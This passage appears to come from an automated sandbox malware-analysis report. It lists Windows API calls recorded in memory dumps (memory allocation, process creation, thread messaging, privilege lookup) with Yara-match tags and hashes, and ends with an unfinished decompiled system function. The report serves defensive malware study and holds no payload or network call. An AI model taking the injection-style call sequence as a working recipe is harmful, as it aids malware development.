                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: M
                                                                                                                                                        • API String ID: 3535843008-4211545630
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 2488874121-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E01F98788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				short* _v12;
                                                                                                                                                        				void* _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				char _v36;
                                                                                                                                                        				signed int _v40;
                                                                                                                                                        				char _v44;
                                                                                                                                                        				signed int _v48;
                                                                                                                                                        				signed int _v52;
                                                                                                                                                        				signed int _v56;
                                                                                                                                                        				signed int _v60;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				void* _t216;
                                                                                                                                                        				intOrPtr _t231;
                                                                                                                                                        				short* _t235;
                                                                                                                                                        				intOrPtr _t257;
                                                                                                                                                        				short* _t261;
                                                                                                                                                        				intOrPtr _t284;
                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                        				void* _t314;
                                                                                                                                                        				signed int _t318;
                                                                                                                                                        				short* _t319;
                                                                                                                                                        				intOrPtr _t321;
                                                                                                                                                        				void* _t328;
                                                                                                                                                        				void* _t329;
                                                                                                                                                        				char* _t332;
                                                                                                                                                        				signed int _t333;
                                                                                                                                                        				signed int* _t334;
                                                                                                                                                        				void* _t335;
                                                                                                                                                        				void* _t338;
                                                                                                                                                        				void* _t339;
                                                                                                                                                        
                                                                                                                                                        				_t328 = __edx;
                                                                                                                                                        				_t322 = __ecx;
                                                                                                                                                        				_t318 = 0;
                                                                                                                                                        				_t334 = _a4;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v48 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v40 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v52 = 0;
                                                                                                                                                        				if(_t334 == 0) {
                                                                                                                                                        					_t329 = 0xc000000d;
                                                                                                                                                        					L49:
                                                                                                                                                        					_t334[0x11] = _v56;
                                                                                                                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                        					_t334[0x12] = _v60;
                                                                                                                                                        					_t334[0x13] = _v28;
                                                                                                                                                        					_t334[0x17] = _v20;
                                                                                                                                                        					_t334[0x16] = _v48;
                                                                                                                                                        					_t334[0x18] = _v40;
                                                                                                                                                        					_t334[0x14] = _v32;
                                                                                                                                                        					_t334[0x15] = _v52;
                                                                                                                                                        					return _t329;
                                                                                                                                                        				}
                                                                                                                                                        				_v56 = 0;
                                                                                                                                                        				if(E01F98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_v56 = 1;
                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                        						_t207 = E01F7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_push(1);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E01F9718A(_t207);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_v60 = _v60 | 0xffffffff;
                                                                                                                                                        				if(E01F98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_t333 =  *_v8;
                                                                                                                                                        					_v60 = _t333;
                                                                                                                                                        					_t314 = E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					_push(_t333);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E01F9718A(_t314);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_t216 = E01F98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                        				_t332 = ";";
                                                                                                                                                        				if(_t216 < 0) {
                                                                                                                                                        					L17:
                                                                                                                                                        					if(E01F98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        						L30:
                                                                                                                                                        						if(E01F98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        							L46:
                                                                                                                                                        							_t329 = 0;
                                                                                                                                                        							L47:
                                                                                                                                                        							if(_v8 != _t318) {
                                                                                                                                                        								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							if(_v28 != _t318) {
                                                                                                                                                        								if(_v20 != _t318) {
                                                                                                                                                        									E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        									_v20 = _t318;
                                                                                                                                                        									_v40 = _t318;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							goto L49;
                                                                                                                                                        						}
                                                                                                                                                        						_t231 = _v24;
                                                                                                                                                        						_t322 = _t231 + 4;
                                                                                                                                                        						_push(_t231);
                                                                                                                                                        						_v52 = _t322;
                                                                                                                                                        						E01F9718A(_t231);
                                                                                                                                                        						if(_t322 == _t318) {
                                                                                                                                                        							_v32 = _t318;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v32 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        						}
                                                                                                                                                        						if(_v32 == _t318) {
                                                                                                                                                        							_v52 = _t318;
                                                                                                                                                        							L58:
                                                                                                                                                        							_t329 = 0xc0000017;
                                                                                                                                                        							goto L47;
                                                                                                                                                        						} else {
                                                                                                                                                        							E01F72340(_v32, _v8, _v24);
                                                                                                                                                        							_v16 = _v32;
                                                                                                                                                        							_a4 = _t318;
                                                                                                                                                        							_t235 = E01F8E679(_v32, _t332);
                                                                                                                                                        							while(1) {
                                                                                                                                                        								_t319 = _t235;
                                                                                                                                                        								if(_t319 == 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								 *_t319 = 0;
                                                                                                                                                        								_t321 = _t319 + 2;
                                                                                                                                                        								E01F7E2A8(_t322,  &_v68, _v16);
                                                                                                                                                        								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        								_v16 = _t321;
                                                                                                                                                        								_t235 = E01F8E679(_t321, _t332);
                                                                                                                                                        								_pop(_t322);
                                                                                                                                                        							}
                                                                                                                                                        							_t236 = _v16;
                                                                                                                                                        							if( *_v16 != _t319) {
                                                                                                                                                        								E01F7E2A8(_t322,  &_v68, _t236);
                                                                                                                                                        								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							if(_a4 == 0) {
